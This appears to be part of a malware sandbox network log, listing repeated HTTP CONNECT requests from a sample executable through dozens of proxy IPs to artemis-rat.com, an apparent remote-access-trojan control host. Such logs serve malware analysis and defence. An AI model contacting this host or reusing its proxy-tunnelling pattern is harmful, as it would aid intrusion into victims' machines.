                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2184192.168.2.55355445.173.12.14119943876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.437812090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.610029936 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2185192.168.2.55540495.66.138.2188803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.437941074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2186192.168.2.553599217.52.247.8619813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.438255072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.498806953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.595158100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.701965094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2187192.168.2.555390103.145.150.2680803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.438335896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2188192.168.2.555375103.176.96.13280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.438427925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2189192.168.2.55447824.144.95.21880003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.438430071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.614360094 CET19INHTTP/1.0 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2190192.168.2.555424104.238.111.10754523876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.438492060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.014482975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.509099007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.514488935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.608247995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.608315945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.701919079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.714030027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2191192.168.2.555497142.54.229.24941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.441020012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2192192.168.2.553697198.12.255.193227853876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.441848040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.498806953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.595158100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.701977015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2193192.168.2.553774107.180.95.177647313876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.441956997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.498781919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.595139980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.701961994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2194192.168.2.553682135.148.10.161411463876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.444593906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2195192.168.2.553782162.241.46.40414423876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.497452021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2196192.168.2.553689107.180.95.177639513876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.498259068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.514615059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2197192.168.2.553712177.87.250.669993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.499823093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.687254906 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2198192.168.2.553805159.224.45.64418903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.516379118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.876199961 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 717
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:51 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 11 Mar 2024 02:30:51 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2199192.168.2.555502199.229.254.12941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.516482115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2200192.168.2.55545243.255.113.232803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.516483068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.092545033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.702086926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.701951981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2201192.168.2.55550191.241.217.5890903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.528938055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2202192.168.2.55549938.54.116.981183876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.535258055 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.389467001 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.701972961 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.202143908 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.202116013 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2203192.168.2.555460184.170.248.541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.536448002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2204192.168.2.55551091.134.140.160325883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.557642937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2205192.168.2.55549865.169.38.73265923876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.047028065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2206192.168.2.55387445.173.231.1979993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.047281981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.330807924 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2207192.168.2.55398251.161.33.206130033876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.056529999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.701973915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.405402899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
